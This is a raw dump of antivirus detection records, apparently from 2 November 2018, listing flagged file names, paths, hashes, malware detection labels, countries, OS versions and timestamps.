  Row(detection=Row(filename='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DE5FBAC9FDA9A5CB9195EBC9162F8101DA8C96FC2CF5FB669A905636D5A804B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:29:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='348ff2648677b1817495d85ef8538b636321019d99c4b8f28d569f1492661231', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\348FF2648677B1817495D85EF8538B636321019D99C4B8F28D569F1492661231', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='348ff2648677b1817495d85ef8538b636321019d99c4b8f28d569f1492661231', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A78CBB83F36F008D550E3FE037743FB216180CCC39EE2BCBB137DF15C51B34B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:22:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fph_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\fph_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='1378f427e8f97a775d5a15d5322d61b7c9590a21f05da06ca7581ed840c42425', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:16:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ace1ed1424594e5959ea96e123af48272c809efbae1f684282889473453cb7b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5ACE1ED1424594E5959EA96E123AF48272C809EFBAE1F684282889473453CB7B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ace1ed1424594e5959ea96e123af48272c809efbae1f684282889473453cb7b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143356-2170b066', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1dac666a\\AVSCAN-20181102-143223-17A8CB87\\AVSCAN-20181102-143356-2170B066', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='richiesta.doc', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Outlook\\3AZ9WL7K\\Richiesta.doc', filesize=128000, name='W97M/Agent.70420299.#M1.#R1'), hash='5931fbfdefaf9688b21ca1bd6de7aab4662e6ab31107518218ad430c3226848e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office 15\\root\\office15\\outlook.exe', parentsize=19169368, timestamp='2018-11-02T17:44:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051708-84055b72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051708-84055B72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='d:\\desktop\\rhinoceros.6.v6.4.18124.12321.x64_p30download.com\\rhinoceros.6.v6.4.18124.12321.x64_p30download.com\\patch\\patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ace1ed1424594e5959ea96e123af48272c809efbae1f684282889473453cb7b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5ACE1ED1424594E5959EA96E123AF48272C809EFBAE1F684282889473453CB7B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ace1ed1424594e5959ea96e123af48272c809efbae1f684282889473453cb7b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054553-87dd61fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054553-87DD61FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144715-c118235d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144715-C118235D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050726-28e25d13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050726-28E25D13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\Thomas\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='67cc371c49a7291fe4876dbdf80af50a6a69611f73c780158c3524a0af5e46fa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111015-0ad3e5da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ea13379\\AVSCAN-20181102-110929-00C28E8E\\AVSCAN-20181102-111015-0AD3E5DA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061936-3dd5afcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061936-3DD5AFCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061236-43883917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061236-43883917', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050240-7ec54ed9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050240-7EC54ED9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061411-7c2fc725', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061411-7C2FC725', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180021-32c20a1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e3d848e\\AVSCAN-20181102-174133-67CF7468\\AVSCAN-20181102-180021-32C20A1C', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:00:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{06332CB9-78B5-49D8-A9B1-18CF5E84F1B7}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='64c554850fb7cbc38bfd6ae3b355d043d0b95f1342a2a512330936a4f0302383', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052856-29b773c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052856-29B773C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053914-9a23e248', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053914-9A23E248', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e00', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e00', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122406-85452de9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122406-85452DE9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052854-28b8141c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052854-28B8141C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060425-1f0e2067', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060425-1F0E2067', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055532-e0fed73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055532-E0FED73D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061747-fcee5ce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061747-FCEE5CE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055336-9c57fddb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055336-9C57FDDB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060420-1be5c2ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060420-1BE5C2AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055108-4419f62b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055108-4419F62B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062039-63402231', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062039-63402231', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053302-bc89f103', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053302-BC89F103', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052353-759fa401', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052353-759FA401', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052340-6d55e4c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052340-6D55E4C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062523-0cbbf7d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062523-0CBBF7D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4af1a48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4AF1A48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061907-2c900fe1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061907-2C900FE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051307-f447cffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051307-F447CFFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061829-16099360', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061829-16099360', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062441-f38d78b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062441-F38D78B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061917-3284dbb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061917-3284DBB6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054702-b185fd44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054702-B185FD44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055304-891b7411', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055304-891B7411', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050433-c1c10beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050433-C1C10BEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054530-7ab594d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054530-7AB594D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:29Z'), dt=datetime.date(2018, 11, 2)),
